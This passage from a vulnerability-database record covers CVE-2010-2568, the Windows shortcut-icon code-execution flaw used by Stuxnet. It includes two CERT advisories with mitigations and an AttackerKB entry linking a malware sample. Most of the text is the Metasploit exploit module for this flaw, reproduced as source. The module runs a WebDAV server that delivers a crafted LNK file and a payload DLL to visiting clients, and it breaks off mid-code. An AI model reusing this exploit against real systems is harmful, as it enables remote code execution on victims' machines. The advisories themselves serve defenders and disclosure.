"cpe:2.3:o:microsoft:windows_vista:*:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_vista:*:sp2:x64:*:*:*:*:*"]}], "attackerkb": [{"lastseen": "2021-04-15T21:15:39", "bulletinFamily": "info", "cvelist": ["CVE-2010-2568", "CVE-2010-2772"], "description": "Windows Shell in Microsoft Windows XP SP3, Server 2003 SP2, Vista SP1 and SP2, Server 2008 SP2 and R2, and Windows 7 allows local users or remote attackers to execute arbitrary code via a crafted (1) .LNK or (2) .PIF shortcut file, which is not properly handled during icon display in Windows Explorer, as demonstrated in the wild in July 2010, and originally reported for malware that leverages CVE-2010-2772 in Siemens WinCC SCADA systems.\n\n \n**Recent assessments:** \n \n**loneicewolf** at February 08, 2021 8:53pm UTC reported:\n\n<https://github.com/loneicewolf/fanny.bmp/blob/main/Reports/Fanny.BMP(DementiaWheel)_Technical_Report_By_WilliamMartens-2021-10Feb.pdf>\n\nTechnical Write up: DONE. Finally, it\u2019s available here for read \n(and, please feedback! if you have any) \n<https://www.youtube.com/watch?v=Uto_lcD2f38> POC video for windows xp SP3\n\nSample: <https://github.com/loneicewolf/fanny.bmp>\n\nAssessed Attacker Value: 4 \nAssessed Attacker Value: 5\n", "modified": "2020-07-30T00:00:00", "published": "2010-07-22T00:00:00", "id": "AKB:01D63072-BA00-4550-BD35-941F73657FDB", "href": "https://attackerkb.com/topics/nffaTD2h9a/cve-2010-2568", "type": "attackerkb", "title": "CVE-2010-2568", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "cert": [{"lastseen": "2020-09-18T20:42:13", "bulletinFamily": "info", "cvelist": ["CVE-2010-2568"], "description": "### Overview \n\nMicrosoft Windows automatically executes code specified in shortcut (`LNK` and `PIF`) files.\n\n### Description \n\nMicrosoft Windows supports the use of shortcut or `LNK` files. A `LNK` file is a reference to a local file. A `PIF` file is a shortcut to a MS-DOS application. Clicking on a `LNK` or `PIF` file has essentially the same outcome as clicking on the file that is specified as the shortcut target. For example, clicking a shortcut to `calc.exe` will launch `calc.exe`, and clicking a shortcut to `readme.txt` will open `readme.txt` with the associated application for handling text files.\n\nMicrosoft Windows fails to safely obtain icons for shortcut files. When Windows displays Control Panel items, it will initialize each object for the purpose of providing dynamic icon functionality. This means that a Control Panel applet will execute code when the icon is displayed in Windows. Through use of a shortcut file, an attacker can specify a malicious DLL that is to be processed within the context of the Windows Control Panel, which will result in arbitrary code execution. The specified code may reside on a USB drive, local or remote filesystem, a CD-ROM, or other locations. Viewing the location of a shortcut file with Windows Explorer is sufficient to trigger the vulnerability. By default, Microsoft Windows has AutoRun/AutoPlay features enabled. These features can cause Windows to automatically open Windows Explorer when a removable drive, such as a USB thumb drive, is connected. Other applications that display file icons can be used as an attack vector for this vulnerability as well. When used in conjunction with a WebDav resource, Internet Explorer can be used as an attack vector for this vulnerability. With the case of Internet Explorer, no user interaction beyond viewing a web page is required to trigger the vulnerability. \n \nThis vulnerability is being exploited in the wild to spread malware (stuxnet) that targets control systems. Exploit code for this vulnerability is publicly available. \n \n--- \n \n### Impact \n\nBy convincing a user to display a specially-crafted shortcut file, an attacker may be able to execute arbitrary code with the privileges of the user. Depending on the operating system and AutoRun/AutoPlay configuration, this can happen automatically by connecting a USB device. This vulnerability can also be triggered by viewing a web page with Internet Explorer or opening a document with Microsoft Office. \n \n--- \n \n### Solution \n\n**Apply an update** \nThis issue is addressed in Microsoft Security Bulletin [MS10-046](<http://www.microsoft.com/technet/security/bulletin/ms10-046.mspx>). Also consider the following workarounds: \n \n--- \n \n \n**Disable the displaying of icons for shortcuts** \n \nAccording to Microsoft Security Advisory 2286198: \n \n**_Note_**_ See _[_Microsoft Knowledge Base Article 2286198_](<http://support.microsoft.com/kb/2286198>)_ to use the automated Microsoft Fix it solution to enable or disable this workaround._ \n \n**_Note_**_ Using Registry Editor incorrectly can cause serious problems that may require you to reinstall your operating system. Microsoft cannot guarantee that problems resulting from the incorrect use of Registry Editor can be solved. Use Registry Editor at your own risk. For information about how to edit the registry, view the \"Changing Keys And Values\" Help topic in Registry Editor (Regedit.exe) or view the \"Add and Delete Information in the Registry\" and \"Edit Registry Data\" Help topics in Regedt32.exe._ \n\n\n 1. _Click Start, click Run, type Regedit in the Open box, and then click OK._\n 2. _Locate and then click the following registry key: \n_`_HKEY_CLASSES_ROOT\\lnkfile\\shellex\\IconHandler_`\n 3. _Click the File menu and select Export._\n 4. _In the Export Registry File dialog box, enter LNK_Icon_Backup.reg and click Save. \nNote This will create a backup of this registry key in the My Documents folder by default_\n 5. _Select the value (Default) on the right hand window in the Registy Editor. Press Enter to edit the value of the key. Remove the value, so that the value is blank, and press Enter._\n 6. _Locate and then click the following registry key: \n_`_HKEY_CLASSES_ROOT\\piffile\\shellex\\IconHandler_`\n 7. _Click the File menu and select Export._\n 8. _In the Export Registry File dialog box, enter PIF_Icon_Backup.reg and click Save. \nNote This will create a backup of this registry key in the My Documents folder by default._\n 9. _Select the value (Default) on the right hand window in the Registy Editor. Press Enter to edit the value of the key. Remove the value, so that the value is blank, and press Enter._\n 10. _Log all users off and on again, or restart the computer._\nNote that this mitigation may prevent Windows shortcuts from displaying some icons. \n \n**Disable AutoRun** \n \nDisabling AutoRun can increase the amount of user interaction that is required to trigger this vulnerability. It will not block the vulnerability, however. Please see Microsoft Support article [967715](<http://support.microsoft.com/kb/967715>) for more details. Setting the `NoDriveTypeAutoRun` registry entry to `0xFF` should provide the highest amount of protection. \n \n**Use least privilege** \n \nUse \"least privilege\" approach to user accounts. By reducing the privileges of the user accounts, the impact of this and other vulnerabilties may be reduced. More information about this technique is available in the Microsoft TechNet article [Applying the Principle of Least Privilege to User Accounts on Windows XP](<http://technet.microsoft.com/en-us/library/bb456992.aspx>). Note that these concepts still apply to Windows Vista and newer operating systems. \n \n**Disable the WebClient service** \n \nAccording to Microsoft Security Advisory [2286198](<http://www.microsoft.com/technet/security/advisory/2286198.mspx>): \n \n_Disabling the WebClient service helps protect affected systems from attempts to exploit this vulnerability by blocking the most likely remote attack vector through the Web Distributed Authoring and Versioning (WebDAV) client service. After applying this workaround, it will still be possible for remote attackers who successfully exploited this vulnerability to cause Microsoft Office Outlook to run programs located on the targeted user's computer or the Local Area Network (LAN), but users will be prompted for confirmation before opening arbitrary programs from the Internet._ \n \n_To disable the WebClient Service, follow these steps:_\n\n 1. _Click Start, click Run, type Services.msc and then click OK._\n 2. _Right-click WebClient service and select Properties._\n 3. _Change the Startup type to Disabled. If the service is running, click Stop._\n 4. _Click OK and exit the management application._\n**Block outgoing SMB traffic** \n \nBlock outgoing connections on ports 139/tcp, 139/udp, 445/tcp, and 445/udp at your network perimeter. Doing so will help prevent machines on the local network from connecting to SMB servers on the internet. While this does not remove the vulnerability, it does block an attack vector for this vulnerability. \n \n**Use a web browser other than Internet Explorer** \n \nInternet Explorer is very closely integrated with the Microsoft Windows operating system. Because of this, Internet Explorer can often be used as an attack vector for vulnerabilities in the Microsoft Windows operating system. In this case, Internet Explorer can be used to trigger the vulnerability with no user interaction required beyond visiting a malicious or compromised website. Other browsers appear to require additional user interaction. \n--- \n \n### Vendor Information\n\n940193\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Additional information available\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n**Javascript is disabled. Click here to view vendors.**\n\n### Microsoft Corporation __ Affected\n\nNotified: July 15, 2010 Updated: August 02, 2010 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThis issue is addressed in Microsoft Security Bulletin [MS10-046](<http://www.microsoft.com/technet/security/bulletin/ms10-046.mspx>).\n\n### Vendor References\n\n * <http://www.microsoft.com/technet/security/bulletin/ms10-046.mspx>\n * <http://support.microsoft.com/kb/2286198>\n * <http://www.microsoft.com/technet/security/advisory/2286198.mspx>\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | | \nTemporal | | \nEnvironmental | | \n \n \n\n\n### References \n\n * <http://www.microsoft.com/technet/security/bulletin/ms10-046.mspx>\n * <http://www.microsoft.com/technet/security/advisory/2286198.mspx>\n * <http://support.microsoft.com/kb/2286198>\n * <http://isc.sans.edu/diary.html?storyid=9190>\n * <http://www.securityfocus.com/bid/41732>\n * <http://secunia.com/advisories/40647/>\n * <http://support.microsoft.com/kb/967715>\n * <http://www.anti-virus.by/en/tempo.shtml>\n * <http://krebsonsecurity.com/2010/07/experts-warn-of-new-windows-shortcut-flaw/>\n * <http://www.f-secure.com/weblog/archives/new_rootkit_en.pdf>\n * <http://www.f-secure.com/weblog/archives/00001986.html>\n * <http://www.f-secure.com/weblog/archives/00001987.html>\n * <http://support.automation.siemens.com/WW/view/en/43876783>\n\n### Acknowledgements\n\nThis vulnerability was discovered by VirusBlokAda through its exploitation in the wild.\n\nThis document was written by Will Dormann.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2010-2568](<http://web.nvd.nist.gov/vuln/detail/CVE-2010-2568>) \n---|--- \n**Severity Metric:** | 72.90 \n**Date Public:** | 2010-07-10 \n**Date First Published:** | 2010-07-15 \n**Date Last Updated: ** | 2010-09-09 19:59 UTC \n**Document Revision: ** | 83 \n", "modified": "2010-09-09T19:59:00", "published": "2010-07-15T00:00:00", "id": "VU:940193", "href": "https://www.kb.cert.org/vuls/id/940193", "type": "cert", "title": "Microsoft Windows automatically executes code specified in shortcut files", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-09-18T20:42:00", "bulletinFamily": "info", "cvelist": ["CVE-2010-2568", "CVE-2015-0096", "CVE-2017-8464"], "description": "### Overview \n\nMicrosoft Windows automatically executes code specified in shortcut (`LNK`) files.\n\n### Description \n\nMicrosoft Windows supports the use of shortcut or `LNK` files. A `LNK` file is a reference to a local file. Clicking on a `LNK` or file has essentially the same outcome as clicking on the file that is specified as the shortcut target. For example, clicking a shortcut to `calc.exe` will launch `calc.exe`, and clicking a shortcut to `readme.txt` will open `readme.txt` with the associated application for handling text files.\n\nMicrosoft Windows fails to safely obtain icons for shortcut files. When Windows displays Control Panel items, it will initialize each object for the purpose of providing dynamic icon functionality. This means that a Control Panel applet will execute code when the icon is displayed in Windows. Through use of a shortcut file, an attacker can specify a malicious DLL that is to be processed within the context of the Windows Control Panel, which will result in arbitrary code execution. The specified code may reside on a USB drive, local or remote filesystem, a CD-ROM, or other locations. Viewing the location of a shortcut file with Windows Explorer is sufficient to trigger the vulnerability. Other applications that display file icons can be used as an attack vector for this vulnerability as well. \n \nThe origin of this vulnerability is outlined in [VU#940193](<https://www.kb.cert.org/vuls/id/940193>) (CVE-2010-2568). The fix for CVE-2010-2568 and the subsequent fix for CVE-2015-0096 are both insufficient in that they not take into account LNK files that use the [SpecialFolderDataBlock](<https://msdn.microsoft.com/en-us/library/dd891269.aspx>) or [KnownFolderDataBlock](<https://msdn.microsoft.com/en-us/library/dd871390.aspx>) attributes to specify the location of a folder. Such files are able to bypass the whitelisting first implemented in the fix for CVE-2010-2568. \n \nExploit code for this vulnerability is publicly available. \n \n--- \n \n### Impact \n\nBy convincing a user to display a specially-crafted shortcut file, an attacker may be able to execute arbitrary code with the privileges of the user. Depending on the operating system and AutoRun/AutoPlay configuration, this can happen automatically by connecting a USB device. \n \n--- \n \n### Solution \n\n**Apply an update** \n \nThis issue is addressed in the [Microsoft Update for CVE-2017-8464](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8464>). \n \n--- \n \n**Block outgoing SMB traffic** \n \nBlock outgoing connections on ports 139/tcp, 139/udp, 445/tcp, and 445/udp at your network perimeter. Doing so will help prevent machines on the local network from connecting to SMB servers on the internet. While this does not remove the vulnerability, it does block an attack vector for this and other vulnerabilities. \n \n**Disable WebDAV** \n \nEven if outgoing SMB traffic is disabled, Windows clients can still connect to network shares using the [WebDAV](<https://msdn.microsoft.com/en-us/library/windows/desktop/dd408161\\(v=vs.85\\).aspx>) protocol, which uses HTTP as a transport. WebDAV can be disabled at various layers, depending on the requirements of your organization: \n \n**At the client** \n \nTo disable WebDAV on a Windows client, set the `Startup type` property for the `WebClient` service to `Disabled`. Note that this may interfere with the ability to access features that utilize WebDAV, such as some aspects of Microsoft SharePoint. \n \n**On the network** \n \nWebDAV can be blocked at the network level by blocking the methods used by the WebDAV extension to HTTP. See [Blocking WebDAV methods](<https://packetsneverlie.blogspot.com/2010/09/blocking-webdav-methods.html>) for an example of how to accomplish this. Check with your firewall vendor for more details. \n \n--- \n \n### Vendor Information\n\n824672\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Additional information available\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n**Javascript is disabled. Click here to view vendors.**\n\n### Microsoft Corporation Affected\n\nUpdated: August 03, 2017 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8464>\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | 7.5 | AV:N/AC:L/Au:N/C:P/I:P/A:P \nTemporal | 6.2 | E:F/RL:OF/RC:C \nEnvironmental | 6.2 | CDP:ND/TD:H/CR:ND/IR:ND/AR:ND \n \n \n\n\n### References \n\n * <https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8464>\n * <https://msdn.microsoft.com/en-us/library/windows/desktop/dd408161(v=vs.85).aspx>\n * <https://packetsneverlie.blogspot.com/2010/09/blocking-webdav-methods.html>\n\n### Acknowledgements\n\nThis document was written by Will Dormann.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2017-8464](<http://web.nvd.nist.gov/vuln/detail/CVE-2017-8464>) \n---|--- \n**Date Public:** | 2017-06-13 \n**Date First Published:** | 2017-08-03 \n**Date Last Updated: ** | 2017-08-09 14:18 UTC \n**Document Revision: ** | 18 \n", "modified": "2017-08-09T14:18:00", "published": "2017-08-03T00:00:00", "id": "VU:824672", "href": "https://www.kb.cert.org/vuls/id/824672", "type": "cert", "title": "Microsoft Windows automatically executes code specified in shortcut files", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2016-12-05T22:25:06", "description": "", "published": "2010-08-05T00:00:00", "type": "packetstorm", "title": "Microsoft Windows Shell LNK Code Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-2568"], "modified": "2010-08-05T00:00:00", "id": "PACKETSTORM:92425", "href": "https://packetstormsecurity.com/files/92425/Microsoft-Windows-Shell-LNK-Code-Execution.html", "sourceData": "`## \n# $Id: ms10_046_shortcut_icon_dllloader.rb 9955 2010-08-04 02:21:20Z jduck $ \n## \n \n## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = ExcellentRanking \n \n# \n# This module acts as an HTTP server \n# \ninclude Msf::Exploit::Remote::HttpServer::HTML \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Microsoft Windows Shell LNK Code Execution', \n'Description' => %q{ \nThis module exploits a vulnerability in the handling of Windows \nShortcut files (.LNK) that contain an icon resource pointing to a \nmalicious DLL. This module creates a WebDAV service that can be used \nto run an arbitrary payload when accessed as a UNC path. \n}, \n'Author' => \n[ \n'hdm', # Module itself \n'jduck', # WebDAV implementation, UNCHOST var \n'B_H' # Clean LNK template \n], \n'License' => MSF_LICENSE, \n'Version' => '$Revision: 9955 $', \n'References' => \n[ \n['CVE', '2010-2568'], \n['OSVDB', '66387'], \n['MSB', 'MS10-046'], \n['URL', 'http://www.microsoft.com/technet/security/advisory/2286198.mspx'] \n], \n'DefaultOptions' => \n{ \n'EXITFUNC' => 'process', \n}, \n'Payload' => \n{ \n'Space' => 2048, \n}, \n'Platform' => 'win', \n'Targets' => \n[ \n[ 'Automatic', { } ] \n], \n'DisclosureDate' => 'Jul 16 2010', \n'DefaultTarget' => 0)) \n \nregister_options( \n[ \nOptPort.new( 'SRVPORT', [ true, \"The daemon port to listen on (do not change)\", 80 ]), \nOptString.new( 'URIPATH', [ true, \"The URI to use (do not change).\", \"/\" ]), \nOptString.new( 'UNCHOST', [ false, \"The host portion of the UNC path to provide to clients (ex: 1.2.3.4).\" ]) \n], self.class) \n \nderegister_options('SSL', 'SSLVersion') # Just for now \nend \n \ndef on_request_uri(cli, request) \n \ncase request.method \nwhen 'OPTIONS' \nprocess_options(cli, request) \nwhen 'PROPFIND' \nprocess_propfind(cli, request) \nwhen 'GET' \nprocess_get(cli, request) \nelse \nprint_error(\"Unexpected request method encountered: #{request.method}\") \nresp = create_response(404, \"Not Found\") \nresp.body = \"\" \nresp['Content-Type'] = 'text/html' \ncli.send_response(resp) \nend \n \nend \n \ndef process_get(cli, request) \n \nmyhost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST'] \nwebdav = \"\\\\\\\\#{myhost}\\\\\" \n \nif (request.uri =~ /\\.dll$/i) \nprint_status \"Sending DLL payload #{cli.peerhost}:#{cli.peerport} ...\" \nreturn if ((p = regenerate_payload(cli)) == nil) \n# Can't use generate_exe from Msf::Exploit::EXE since it can't currently generate dlls :-/ \ndata = Msf::Util::EXE.to_win32pe_dll(framework, p.encoded) \nsend_response(cli, data, { 'Content-Type' => 'application/octet-stream' }) \nreturn \nend \n \nif (request.uri =~ /\\.lnk$/i) \nprint_status \"Sending LNK file to #{cli.peerhost}:#{cli.peerport} ...\" \n \ndata = generate_link(\"#{@exploit_unc}#{@exploit_dll}\") \n \nsend_response(cli, data, { 'Content-Type' => 'application/octet-stream' }) \nreturn \nend \n \nprint_status \"Sending UNC redirect to #{cli.peerhost}:#{cli.peerport} ...\" \nresp = create_response(200, \"OK\") \n \nresp.body = %Q|<html><head><meta http-equiv=\"refresh\" content=\"0;URL=#{@exploit_unc}\"></head><body></body></html>| \n \nresp['Content-Type'] = 'text/html' \ncli.send_response(resp) \nend \n \n# \n# OPTIONS requests sent by the WebDav Mini-Redirector \n# \ndef process_options(cli, request) \nprint_status(\"Responding to WebDAV OPTIONS request from #{cli.peerhost}:#{cli.peerport}\") \nheaders = { \n'MS-Author-Via' => 'DAV', \n# 'DASL' => '<DAV:sql>', \n# 'DAV' => '1, 2', \n'Allow' => 'OPTIONS, GET, PROPFIND', \n'Public' => 'OPTIONS, GET, PROPFIND' \n} \nresp = create_response(207, \"Multi-Status\") \nresp.body = \"\" \nresp['Content-Type'] = 'text/xml' \ncli.send_response(resp) \nend \n \n# \n# PROPFIND requests sent by the WebDav Mini-Redirector \n# \ndef process_propfind(cli, request) \npath = request.uri \nprint_status(\"Received WebDAV PROPFIND request from #{cli.peerhost}:#{cli.peerport} #{path}\") \nbody = '' \n \nmy_host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST'] \nmy_uri = \"http://#{my_host}/\" \n \nif path =~ /\\.dll$/i \n# Response for the DLL \nprint_status(\"Sending DLL multistatus for #{path} ...\") \nbody = %Q|<?xml version=\"1.0\" encoding=\"utf-8\"?> \n<D:multistatus xmlns:D=\"DAV:\" xmlns:b=\"urn:uuid:c2f41010-65b3-11d1-a29f-00aa00c14882/\"> \n<D:response xmlns:lp1=\"DAV:\" xmlns:lp2=\"http://apache.org/dav/props/\"> \n<D:href>#{path}#{@exploit_dll}</D:href> \n<D:propstat> \n<D:prop> \n<lp1:resourcetype/> \n<lp1:creationdate>2010-07-19T20:29:42Z</lp1:creationdate> \n<lp1:getcontentlength>#{rand(0x100000)+128000}</lp1:getcontentlength> \n<lp1:getlastmodified>Mon, 19 Jul 2010 20:29:42 GMT</lp1:getlastmodified> \n<lp1:getetag>\"#{\"%.16x\" % rand(0x100000000)}\"</lp1:getetag> \n<lp2:executable>T</lp2:executable> \n<D:supportedlock> \n<D:lockentry> \n<D:lockscope><D:exclusive/></D:lockscope> \n<D:locktype><D:write/></D:locktype> \n</D:lockentry> \n<D:lockentry> \n<D:lockscope><D:shared/></D:lockscope> \n<D:locktype><D:write/></D:locktype> \n</D:lockentry> \n</D:supportedlock> \n<D:lockdiscovery/> \n<D:getcontenttype>application/octet-stream</D:getcontenttype> \n</D:prop> \n<D:status>HTTP/1.1 200 OK</D:status> \n</D:propstat> \n</D:response> \n</D:multistatus> \n| \n \nresp = create_response(207, \"Multi-Status\") \nresp.body = body \nresp['Content-Type'] = 'text/xml' \ncli.send_response(resp) \nreturn \nend \n \nif path =~ /\\.lnk$/i \n# Response for the DLL \nprint_status(\"Sending DLL multistatus for #{path} ...\") \nbody = %Q|<?xml version=\"1.0\" encoding=\"utf-8\"?> \n<D:multistatus xmlns:D=\"DAV:\" xmlns:b=\"urn:uuid:c2f41010-65b3-11d1-a29f-00aa00c14882/\"> \n<D:response xmlns:lp1=\"DAV:\" xmlns:lp2=\"http://apache.org/dav/props/\"> \n<D:href>#{path}#{@exploit_lnk}</D:href> \n<D:propstat> \n<D:prop> \n<lp1:resourcetype/> \n<lp1:creationdate>2010-07-19T20:29:42Z</lp1:creationdate> \n<lp1:getcontentlength>#{rand(0x100)+128}</lp1:getcontentlength> \n<lp1:getlastmodified>Mon, 19 Jul 2010 20:29:42 GMT</lp1:getlastmodified> \n<lp1:getetag>\"#{\"%.16x\" % rand(0x100000000)}\"</lp1:getetag> \n<lp2:executable>T</lp2:executable> \n<D:supportedlock> \n<D:lockentry> \n<D:lockscope><D:exclusive/></D:lockscope> \n<D:locktype><D:write/></D:locktype> \n</D:lockentry> \n<D:lockentry> \n<D:lockscope><D:shared/></D:lockscope> \n<D:locktype><D:write/></D:locktype> \n</D:lockentry> \n</D:supportedlock> \n<D:lockdiscovery/> \n<D:getcontenttype>shortcut</D:getcontenttype> \n</D:prop> \n<D:status>HTTP/1.1 200 OK</D:status> \n</D:propstat> \n</D:response> \n</D:multistatus> \n| \n \nresp = create_response(207, \"Multi-Status\") \nresp.body = body \nresp['Content-Type'] = 'text/xml' \ncli.send_response(resp) \nreturn \nend \n \nif path !~ /\\/$/ \n \nif path.index(\".\") \nprint_status(\"Sending 404 for #{path} ...\") \nresp = create_response(404, \"Not Found\") \nresp['Content-Type'] = 'text/html' \ncli.send_response(resp) \nreturn \nelse \nprint_status(\"Sending 301 for #{path} ...\") \nresp = create_response(301, \"Moved\") \nresp[\"Location\"] = path + \"/\" \nresp['Content-Type'] = 'text/html' \ncli.send_response(resp) \nreturn \nend \nend \n \nprint_status(\"Sending directory multistatus for #{path} ...\") \nbody = %Q|<?xml version=\"1.0\" encoding=\"utf-8\"?> \n<D:multistatus xmlns:D=\"DAV:\" xmlns:b=\"urn:uuid:c2f41010-65b3-11d1-a29f-00aa00c14882/\"> \n<D:response xmlns:lp1=\"DAV:\" xmlns:lp2=\"http://apache.org/dav/props/\"> \n<D:href>#{path}</D:href> \n<D:propstat> \n<D:prop> \n<lp1:resourcetype><D:collection/></lp1:resourcetype> \n<lp1:creationdate>2010-07-19T20:29:42Z</lp1:creationdate> \n<lp1:getlastmodified>Mon, 19 Jul 2010 20:29:42 GMT</lp1:getlastmodified> \n<lp1:getetag>\"#{\"%.16x\" % rand(0x100000000)}\"</lp1:getetag> \n<D:supportedlock> \n<D:lockentry> \n<D:lockscope><D:exclusive/></D:lockscope> \n<D:locktype><D:write/></D:locktype> \n</D:lockentry> \n<D:lockentry> \n<D:lockscope><D:shared/></D:lockscope> \n<D:locktype><D:write/></D:locktype> \n</D:lockentry> \n</D:supportedlock> \n<D:lockdiscovery/> \n<D:getcontenttype>httpd/unix-directory</D:getcontenttype> \n</D:prop> \n<D:status>HTTP/1.1 200 OK</D:status> \n</D:propstat> \n</D:response> \n| \n \n \nsubdirectory = %Q| \n<D:response xmlns:lp1=\"DAV:\" xmlns:lp2=\"http://apache.org/dav/props/\"> \n<D:href>#{path}#{Rex::Text.rand_text_alpha(6)}/</D:href> \n<D:propstat> \n<D:prop> \n<lp1:resourcetype><D:collection/></lp1:resourcetype> \n<lp1:creationdate>2010-07-19T20:29:42Z</lp1:creationdate> \n<lp1:getlastmodified>Mon, 19 Jul 2010 20:29:42 GMT</lp1:getlastmodified> \n<lp1:getetag>\"#{\"%.16x\" % rand(0x100000000)}\"</lp1:getetag> \n<D:supportedlock> \n<D:lockentry> \n<D:lockscope><D:exclusive/></D:lockscope> \n<D:locktype><D:write/></D:locktype> \n</D:lockentry> \n<D:lockentry> \n<D:lockscope><D:shared/></D:lockscope> \n<D:locktype><D:write/></D:locktype> \n</D:lockentry> \n</D:supportedlock> \n<D:lockdiscovery/> \n<D:getcontenttype>httpd/unix-directory</D:getcontenttype> \n</D:prop> \n<D:status>HTTP/1.1 200 OK</D:status> \n</D:propstat> \n</D:response> \n| \n \nfiles = %Q| \n<D:response xmlns:lp1=\"DAV:\" xmlns:lp2=\"http://apache.org/dav/props/\"> \n<D:href>#{path}#{@exploit_dll}</D:href> \n<D:propstat> \n<D:prop> \n<lp1:resourcetype/> \n<lp1:creationdate>2010-07-19T20:29:42Z</lp1:creationdate> \n<lp1:getcontentlength>#{rand(0x100000)+128000}</lp1:getcontentlength> \n<lp1:getlastmodified>Mon, 19 Jul 2010 20:29:42 GMT</lp1:getlastmodified> \n<lp1:getetag>\"#{\"%.16x\" % rand(0x100000000)}\"</lp1:getetag> \n<lp2:executable>T</lp2:executable> \n<D:supportedlock> \n<D:lockentry> \n<D:lockscope><D:exclusive/></D:lockscope> \n<D:locktype><D:write/></D:locktype> \n</D:lockentry> \n<D:lockentry> \n<D:lockscope><D:shared/></D:lockscope> \n<D:locktype><D:write/></D:locktype> \n</D:lockentry> \n</D:supportedlock> \n<D:lockdiscovery/> \n<D:getcontenttype>application/octet-stream</D:getcontenttype> \n</D:prop> \n<D:status>HTTP/1.1 200 OK</D:status> \n</D:propstat> \n</D:response> \n \n<D:response xmlns:lp1=\"DAV:\" xmlns:lp2=\"http://apache.org/dav/props/\"> \n<D:href>#{path}#{@exploit_lnk}</D:href> \n<D:propstat> \n<D:prop> \n<lp1:resourcetype/> \n<lp1:creationdate>2010-07-19T20:29:42Z</lp1:creationdate> \n<lp1:getcontentlength>#{rand(0x100)+128}</lp1:getcontentlength> \n<lp1:getlastmodified>Mon, 19 Jul 2010 20:29:42 GMT</lp1:getlastmodified> \n<lp1:getetag>\"#{\"%.16x\" % rand(0x100000000)}\"</lp1:getetag> \n<lp2:executable>T</lp2:executable> \n<D:supportedlock> \n<D:lockentry> \n<D:lockscope><D:exclusive/></D:lockscope> \n<D:locktype><D:write/></D:locktype> \n</D:lockentry> \n<D:lockentry> \n<D:lockscope><D:shared/></D:lockscope> \n<D:locktype><D:write/></D:locktype> \n</D:lockentry> \n</D:supportedlock> \n<D:lockdiscovery/> \n<D:getcontenttype>shortcut</D:getcontenttype> \n</D:prop> \n<D:status>HTTP/1.1 200 OK</D:status> \n</D:propstat> \n</D:response> \n| \nif request[\"Depth\"].to_i > 0 \nif path.scan(\"/\").length < 2 \nbody << subdirectory \nelse \nbody << files \nend \nend \n \nbody << \"</D:multistatus>\" \n \nbody.gsub!(/\\t/, '') \n \n# send the response \nresp = create_response(207, \"Multi-Status\") \nresp.body = body \nresp['Content-Type'] = 'text/xml; charset=\"utf8\"' \ncli.send_response(resp) \nend \n \ndef generate_link(unc) \nuni_unc = unc.unpack(\"C*\").pack(\"v*\") \npath = '' \npath << [ \n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x6a, 0x00, 0x00, 0x00, 0x00, \n0x00, 0x00, 0x00, 0x00, 0x00, 0x00 \n].pack(\"C*\") \npath << uni_unc \n \n# LinkHeader \nret = [ \n0x4c, 0x00, 0x00, 0x00, 0x01, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc0, 0x00, 0x00, 0x00, \n0x00, 0x00, 0x00, 0x46, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, \n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, \n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, \n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 \n].pack('C*') \n \nidlist_data = '' \nidlist_data << [0x12 + 2].pack('v') \nidlist_data << [ \n0x1f, 0x00, 0xe0, 0x4f, 0xd0, 0x20, 0xea, 0x3a, 0x69, 0x10, 0xa2, 0xd8, 0x08, 0x00, 0x2b, 0x30, \n0x30, 0x9d \n].pack('C*') \nidlist_data << [0x12 + 2].pack('v') \nidlist_data << [ \n0x2e, 0x1e, 0x20, 0x20, 0xec, 0x21, 0xea, 0x3a, 0x69, 0x10, 0xa2, 0xdd, 0x08, 0x00, 0x2b, 0x30, \n0x30, 0x9d \n].pack('C*') \nidlist_data << [path.length + 2].pack('v') \nidlist_data << path \nidlist_data << [0x00].pack('v') # TERMINAL WOO \n \n# LinkTargetIDList \nret << [idlist_data.length].pack('v') # IDListSize \nret << idlist_data \n \n# ExtraData blocks (none) \nret << [rand(4)].pack('V') \n \n# Patch in the LinkFlags \nret[0x14, 4] = 